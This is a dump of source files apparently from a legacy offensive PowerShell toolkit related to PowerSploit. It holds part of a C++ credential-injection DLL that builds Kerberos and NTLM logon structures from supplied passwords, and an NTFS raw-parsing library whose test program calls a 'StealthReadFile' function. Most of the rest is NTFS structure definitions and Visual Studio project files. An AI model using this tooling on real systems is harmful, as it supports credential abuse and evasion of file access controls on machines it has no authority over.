217 | size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(KERB_INTERACTIVE_LOGON);
218 |
219 | ntlmLogon->MessageType = KerbInteractiveLogon;
220 | writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
221 | writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
222 | writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);
223 |
224 | *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
225 | return ntlmLogon;
226 | }
227 |
228 |
229 | PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
230 | {
231 | size_t wcharSize = sizeof(wchar_t);
232 |
233 | size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
234 | MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
235 | size_t writeAddress = (UINT_PTR)ntlmLogon + sizeof(MSV1_0_INTERACTIVE_LOGON);
236 |
237 | ntlmLogon->MessageType = MsV1_0InteractiveLogon;
238 | writeAddress += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), (PVOID)writeAddress);
239 | writeAddress += WriteUnicodeString(username, &(ntlmLogon->UserName), (PVOID)writeAddress);
240 | writeAddress += WriteUnicodeString(password, &(ntlmLogon->Password), (PVOID)writeAddress);
241 |
242 | *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
243 | return ntlmLogon;
244 | }
245 |
246 | //Returns the amount of bytes written.
247 | size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address)
248 | {
249 | size_t size = lstrlenW(str) * sizeof(wchar_t);
250 | uniStr->Length = (USHORT)size;
251 | uniStr->MaximumLength = (USHORT)size;
252 | uniStr->Buffer = (PWSTR)address;
253 | memcpy(address, str, size);
254 | return size;
255 | }
256 |
257 | void WriteErrorToPipe(string errorMsg, HANDLE pipe)
258 | {
259 | const char* error = errorMsg.c_str();
260 | DWORD bytesWritten = 0;
261 | WriteFile(pipe, error, strlen(error), &bytesWritten, NULL);
262 | }
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/logon.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}
23 | Win32Proj
24 | logon
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | v120
31 | Unicode
32 |
33 |
34 | DynamicLibrary
35 | true
36 | v120
37 | Unicode
38 |
39 |
40 | DynamicLibrary
41 | false
42 | v120
43 | true
44 | Unicode
45 |
46 |
47 | DynamicLibrary
48 | false
49 | v120
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
87 |
88 |
89 | Windows
90 | true
91 | secur32.lib;%(AdditionalDependencies)
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
100 |
101 |
102 | Windows
103 | true
104 | secur32.lib;%(AdditionalDependencies)
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
115 | MultiThreaded
116 |
117 |
118 | Windows
119 | true
120 | true
121 | true
122 | secur32.lib;%(AdditionalDependencies)
123 |
124 |
125 |
126 |
127 | Level3
128 | Use
129 | MaxSpeed
130 | true
131 | true
132 | WIN32;NDEBUG;_WINDOWS;_USRDLL;LOGON_EXPORTS;%(PreprocessorDefinitions)
133 | MultiThreaded
134 |
135 |
136 | Windows
137 | true
138 | true
139 | true
140 | secur32.lib;%(AdditionalDependencies)
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 | false
153 | false
154 |
155 |
156 |
157 |
158 | false
159 | false
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 | Create
168 | Create
169 | Create
170 | Create
171 |
172 |
173 |
174 |
175 |
176 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-Mimikatz/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
29 | int _tmain(int argc, _TCHAR* argv[])
30 | {
31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile");
33 |
34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress;
35 |
36 | DWORD buffSize = 1024*1024;
37 | BYTE* buffer = new BYTE[buffSize];
38 | DWORD bytesRead = 0;
39 | ULONGLONG bytesLeft = 0;
40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);
41 |
42 | cout << "Return value: " << ret << endl;
43 |
44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
45 | myFile.write((char*)buffer, bytesRead);
46 |
47 | return 0;
48 | }
49 |
50 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFSParser.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {2F38A7A9-D810-451B-BB19-273770AF4D25}
23 | Win32Proj
24 | NTFSParser
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | NotSet
32 |
33 |
34 | Application
35 | true
36 | v110
37 | NotSet
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | false
88 |
89 |
90 | Console
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 | false
101 |
102 |
103 | Console
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Console
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 | Create
157 | Create
158 | Create
159 | Create
160 |
161 |
162 |
163 |
164 |
165 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFS_Common.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS Class common definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_COMMON_H_CYB70289
18 | #define __NTFS_COMMON_H_CYB70289
19 |
20 | #include
21 | #include
22 | #include
23 | #include
24 |
25 | #include "NTFS_DataType.h"
26 |
27 | #define ATTR_NUMS 16 // Attribute Types count
28 | #define ATTR_INDEX(at) (((at)>>4)-1) // Attribute Type to Index, eg. 0x10->0, 0x30->2
29 | #define ATTR_MASK(at) (((DWORD)1)<
77 | struct NTSLIST_ENTRY
78 | {
79 | NTSLIST_ENTRY *Next;
80 | ENTRY_TYPE *Entry;
81 | };
82 |
83 | // List Entry Smart Pointer
84 | template
85 | class CEntrySmartPtr
86 | {
87 | public:
88 | CEntrySmartPtr(ENTRY_TYPE *ptr = NULL)
89 | {
90 | EntryPtr = ptr;
91 | }
92 |
93 | virtual ~CEntrySmartPtr()
94 | {
95 | if (EntryPtr)
96 | delete EntryPtr;
97 | }
98 |
99 | private:
100 | const ENTRY_TYPE *EntryPtr;
101 |
102 | public:
103 | __inline CEntrySmartPtr operator = (const ENTRY_TYPE* ptr)
104 | {
105 | // Delete previous pointer if allocated
106 | if (EntryPtr)
107 | delete EntryPtr;
108 |
109 | EntryPtr = ptr;
110 |
111 | return *this;
112 | }
113 |
114 | __inline const ENTRY_TYPE* operator->() const
115 | {
116 | _ASSERT(EntryPtr);
117 | return EntryPtr;
118 | }
119 |
120 | __inline BOOL IsValid() const
121 | {
122 | return EntryPtr != NULL;
123 | }
124 | };
125 |
126 | //////////////////////////////////////
127 | // Single list implementation
128 | //////////////////////////////////////
129 | template
130 | class CSList
131 | {
132 | public:
133 | CSList()
134 | {
135 | ListHead = ListTail = NULL;
136 | ListCurrent = NULL;
137 | EntryCount = 0;
138 | }
139 |
140 | virtual ~CSList()
141 | {
142 | RemoveAll();
143 | }
144 |
145 | private:
146 | int EntryCount;
147 | NTSLIST_ENTRY *ListHead;
148 | NTSLIST_ENTRY *ListTail;
149 | NTSLIST_ENTRY *ListCurrent;
150 |
151 | public:
152 | // Get entry count
153 | __inline int GetCount() const
154 | {
155 | return EntryCount;
156 | }
157 |
158 | // Insert to tail
159 | BOOL InsertEntry(ENTRY_TYPE *entry)
160 | {
161 | NTSLIST_ENTRY *le = new NTSLIST_ENTRY;
162 | if (!le)
163 | return FALSE;
164 |
165 | le->Entry = entry;
166 | le->Next = NULL;
167 |
168 | if (ListTail == NULL)
169 | ListHead = le; // Empty list
170 | else
171 | ListTail->Next = le;
172 |
173 | ListTail = le;
174 |
175 | EntryCount++;
176 | return TRUE;
177 | }
178 |
179 | // Remove all entries
180 | void RemoveAll()
181 | {
182 | while (ListHead)
183 | {
184 | ListCurrent = ListHead->Next;
185 | delete ListHead->Entry;
186 | delete ListHead;
187 |
188 | ListHead = ListCurrent;
189 | }
190 |
191 | ListHead = ListTail = NULL;
192 | ListCurrent = NULL;
193 | EntryCount = 0;
194 | }
195 |
196 | // Find first entry
197 | __inline ENTRY_TYPE *FindFirstEntry() const
198 | {
199 | ((CSList*)this)->ListCurrent = ListHead;
200 |
201 | if (ListCurrent)
202 | return ListCurrent->Entry;
203 | else
204 | return NULL;
205 | }
206 |
207 | // Find next entry
208 | __inline ENTRY_TYPE *FindNextEntry() const
209 | {
210 | if (ListCurrent)
211 | ((CSList*)this)->ListCurrent = ListCurrent->Next;
212 |
213 | if (ListCurrent)
214 | return ListCurrent->Entry;
215 | else
216 | return NULL;
217 | }
218 |
219 | // Throw all entries
220 | // Caution! All entries are just thrown without free
221 | __inline void ThrowAll()
222 | {
223 | ListHead = ListTail = NULL;
224 | ListCurrent = NULL;
225 | EntryCount = 0;
226 | }
227 | }; //CSList
228 |
229 |
230 | //////////////////////////////////////
231 | // Stack implementation
232 | //////////////////////////////////////
233 | template
234 | class CStack
235 | {
236 | public:
237 | CStack()
238 | {
239 | ListHead = ListTail = NULL;
240 | EntryCount = 0;
241 | }
242 |
243 | virtual ~CStack()
244 | {
245 | RemoveAll();
246 | }
247 |
248 | private:
249 | int EntryCount;
250 | NTSLIST_ENTRY *ListHead;
251 | NTSLIST_ENTRY *ListTail;
252 |
253 | public:
254 | // Get entry count
255 | __inline int GetCount() const
256 | {
257 | return EntryCount;
258 | }
259 |
260 | // Insert to head
261 | BOOL Push(ENTRY_TYPE *entry)
262 | {
263 | NTSLIST_ENTRY *le = new NTSLIST_ENTRY;
264 | if (!le)
265 | return FALSE;
266 |
267 | le->Entry = entry;
268 | le->Next = ListHead;
269 |
270 | ListHead = le;
271 |
272 | if (ListTail == NULL)
273 | ListTail = le; // Empty list
274 |
275 | EntryCount ++;
276 | return TRUE;
277 | }
278 |
279 | // Remove from head
280 | ENTRY_TYPE* Pop()
281 | {
282 | if (ListHead == NULL)
283 | return NULL;
284 |
285 | NTSLIST_ENTRY *le = ListHead;
286 | ENTRY_TYPE *e = le->Entry;
287 |
288 | if (ListTail == ListHead)
289 | ListTail = ListHead->Next;
290 | ListHead = ListHead->Next;
291 |
292 | delete le;
293 | EntryCount --;
294 |
295 | return e;
296 | }
297 |
298 | // Remove all entries
299 | void RemoveAll()
300 | {
301 | NTSLIST_ENTRY *le;
302 |
303 | while (ListHead)
304 | {
305 | le = ListHead->Next;
306 | delete ListHead->Entry;
307 | delete ListHead;
308 |
309 | ListHead = le;
310 | }
311 |
312 | ListHead = ListTail = NULL;
313 | EntryCount = 0;
314 | }
315 | }; //CStack
316 |
317 | #endif
318 |
--------------------------------------------------------------------------------
/Invoke-NinjaCopy/NTFSParser/NTFSParser/NTFS_DataType.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS data structures and definitions
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_DATATYPE_H_CYB70289
18 | #define __NTFS_DATATYPE_H_CYB70289
19 |
20 | // NTFS Boot Sector BPB
21 |
22 | #define NTFS_SIGNATURE "NTFS "
23 |
24 | #pragma pack(1)
25 | typedef struct tagNTFS_BPB
26 | {
27 | // jump instruction
28 | BYTE Jmp[3];
29 |
30 | // signature
31 | BYTE Signature[8];
32 |
33 | // BPB and extended BPB
34 | WORD BytesPerSector;
35 | BYTE SectorsPerCluster;
36 | WORD ReservedSectors;
37 | BYTE Zeros1[3];
38 | WORD NotUsed1;
39 | BYTE MediaDescriptor;
40 | WORD Zeros2;
41 | WORD SectorsPerTrack;
42 | WORD NumberOfHeads;
43 | DWORD HiddenSectors;
44 | DWORD NotUsed2;
45 | DWORD NotUsed3;
46 | ULONGLONG TotalSectors;
47 | ULONGLONG LCN_MFT;
48 | ULONGLONG LCN_MFTMirr;
49 | DWORD ClustersPerFileRecord;
50 | DWORD ClustersPerIndexBlock;
51 | BYTE VolumeSN[8];
52 |
53 | // boot code
54 | BYTE Code[430];
55 |
56 | //0xAA55
57 | BYTE _AA;
58 | BYTE _55;
59 | } NTFS_BPB;
60 | #pragma pack()
61 |
62 |
63 | // MFT Indexes
64 | #define MFT_IDX_MFT 0
65 | #define MFT_IDX_MFT_MIRR 1
66 | #define MFT_IDX_LOG_FILE 2
67 | #define MFT_IDX_VOLUME 3
68 | #define MFT_IDX_ATTR_DEF 4
69 | #define MFT_IDX_ROOT 5
70 | #define MFT_IDX_BITMAP 6
71 | #define MFT_IDX_BOOT 7
72 | #define MFT_IDX_BAD_CLUSTER 8
73 | #define MFT_IDX_SECURE 9
74 | #define MFT_IDX_UPCASE 10
75 | #define MFT_IDX_EXTEND 11
76 | #define MFT_IDX_RESERVED12 12
77 | #define MFT_IDX_RESERVED13 13
78 | #define MFT_IDX_RESERVED14 14
79 | #define MFT_IDX_RESERVED15 15
80 | #define MFT_IDX_USER 16
81 |
82 |
83 | /******************************
84 | File Record
85 | ---------------------
86 | | File Record Header|
87 | ---------------------
88 | | Attribute 1 |
89 | ---------------------
90 | | Attribute 2 |
91 | ---------------------
92 | | ...... |
93 | ---------------------
94 | | 0xFFFFFFFF |
95 | ---------------------
96 | *******************************/
97 |
98 | // File Record Header
99 |
100 | #define FILE_RECORD_MAGIC 'ELIF'
101 | #define FILE_RECORD_FLAG_INUSE 0x01 // File record is in use
102 | #define FILE_RECORD_FLAG_DIR 0x02 // File record is a directory
103 |
104 | typedef struct tagFILE_RECORD_HEADER
105 | {
106 | DWORD Magic; // "FILE"
107 | WORD OffsetOfUS; // Offset of Update Sequence
108 | WORD SizeOfUS; // Size in words of Update Sequence Number & Array
109 | ULONGLONG LSN; // $LogFile Sequence Number
110 | WORD SeqNo; // Sequence number
111 | WORD Hardlinks; // Hard link count
112 | WORD OffsetOfAttr; // Offset of the first Attribute
113 | WORD Flags; // Flags
114 | DWORD RealSize; // Real size of the FILE record
115 | DWORD AllocSize; // Allocated size of the FILE record
116 | ULONGLONG RefToBase; // File reference to the base FILE record
117 | WORD NextAttrId; // Next Attribute Id
118 | WORD Align; // Align to 4 byte boundary
119 | DWORD RecordNo; // Number of this MFT Record
120 | } FILE_RECORD_HEADER;
121 |
122 |
123 | /******************************
124 | Attribute
125 | --------------------
126 | | Attribute Header |
127 | --------------------
128 | | Attribute Data |
129 | --------------------
130 | *******************************/
131 |
132 | // Attribute Header
133 |
134 | #define ATTR_TYPE_STANDARD_INFORMATION 0x10
135 | #define ATTR_TYPE_ATTRIBUTE_LIST 0x20
136 | #define ATTR_TYPE_FILE_NAME 0x30
137 | #define ATTR_TYPE_OBJECT_ID 0x40
138 | #define ATTR_TYPE_SECURITY_DESCRIPTOR 0x50
139 | #define ATTR_TYPE_VOLUME_NAME 0x60
140 | #define ATTR_TYPE_VOLUME_INFORMATION 0x70
141 | #define ATTR_TYPE_DATA 0x80
142 | #define ATTR_TYPE_INDEX_ROOT 0x90
143 | #define ATTR_TYPE_INDEX_ALLOCATION 0xA0
144 | #define ATTR_TYPE_BITMAP 0xB0
145 | #define ATTR_TYPE_REPARSE_POINT 0xC0
146 | #define ATTR_TYPE_EA_INFORMATION 0xD0
147 | #define ATTR_TYPE_EA 0xE0
148 | #define ATTR_TYPE_LOGGED_UTILITY_STREAM 0x100
149 |
150 | #define ATTR_FLAG_COMPRESSED 0x0001
151 | #define ATTR_FLAG_ENCRYPTED 0x4000
152 | #define ATTR_FLAG_SPARSE 0x8000
153 |
154 | typedef struct tagATTR_HEADER_COMMON
155 | {
156 | DWORD Type; // Attribute Type
157 | DWORD TotalSize; // Length (including this header)
158 | BYTE NonResident; // 0 - resident, 1 - non resident
159 | BYTE NameLength; // name length in words
160 | WORD NameOffset; // offset to the name
161 | WORD Flags; // Flags
162 | WORD Id; // Attribute Id
163 | } ATTR_HEADER_COMMON;
164 |
165 | typedef struct tagATTR_HEADER_RESIDENT
166 | {
167 | ATTR_HEADER_COMMON Header; // Common data structure
168 | DWORD AttrSize; // Length of the attribute body
169 | WORD AttrOffset; // Offset to the Attribute
170 | BYTE IndexedFlag; // Indexed flag
171 | BYTE Padding; // Padding
172 | } ATTR_HEADER_RESIDENT;
173 |
174 | typedef struct tagATTR_HEADER_NON_RESIDENT
175 | {
176 | ATTR_HEADER_COMMON Header; // Common data structure
177 | ULONGLONG StartVCN; // Starting VCN
178 | ULONGLONG LastVCN; // Last VCN
179 | WORD DataRunOffset; // Offset to the Data Runs
180 | WORD CompUnitSize; // Compression unit size
181 | DWORD Padding; // Padding
182 | ULONGLONG AllocSize; // Allocated size of the attribute
183 | ULONGLONG RealSize; // Real size of the attribute
184 | ULONGLONG IniSize; // Initialized data size of the stream
185 | } ATTR_HEADER_NON_RESIDENT;
186 |
187 |
188 | // Attribute: STANDARD_INFORMATION
189 |
190 | #define ATTR_STDINFO_PERMISSION_READONLY 0x00000001
191 | #define ATTR_STDINFO_PERMISSION_HIDDEN 0x00000002
192 | #define ATTR_STDINFO_PERMISSION_SYSTEM 0x00000004
193 | #define ATTR_STDINFO_PERMISSION_ARCHIVE 0x00000020
194 | #define ATTR_STDINFO_PERMISSION_DEVICE 0x00000040
195 | #define ATTR_STDINFO_PERMISSION_NORMAL 0x00000080
196 | #define ATTR_STDINFO_PERMISSION_TEMP 0x00000100
197 | #define ATTR_STDINFO_PERMISSION_SPARSE 0x00000200
198 | #define ATTR_STDINFO_PERMISSION_REPARSE 0x00000400
199 | #define ATTR_STDINFO_PERMISSION_COMPRESSED 0x00000800
200 | #define ATTR_STDINFO_PERMISSION_OFFLINE 0x00001000
201 | #define ATTR_STDINFO_PERMISSION_NCI 0x00002000
202 | #define ATTR_STDINFO_PERMISSION_ENCRYPTED 0x00004000
203 |
204 | typedef struct tagATTR_STANDARD_INFORMATION
205 | {
206 | ULONGLONG CreateTime; // File creation time
207 | ULONGLONG AlterTime; // File altered time
208 | ULONGLONG MFTTime; // MFT changed time
209 | ULONGLONG ReadTime; // File read time
210 | DWORD Permission; // Dos file permission
211 | DWORD MaxVersionNo; // Maxim number of file versions
212 | DWORD VersionNo; // File version number
213 | DWORD ClassId; // Class Id
214 | DWORD OwnerId; // Owner Id
215 | DWORD SecurityId; // Security Id
216 | ULONGLONG QuotaCharged; // Quota charged
217 | ULONGLONG USN; // USN Journel
218 | } ATTR_STANDARD_INFORMATION;
219 |
220 |
221 | // Attribute: ATTRIBUTE_LIST
222 |
223 | typedef struct tagATTR_ATTRIBUTE_LIST
224 | {
225 | DWORD AttrType; // Attribute type
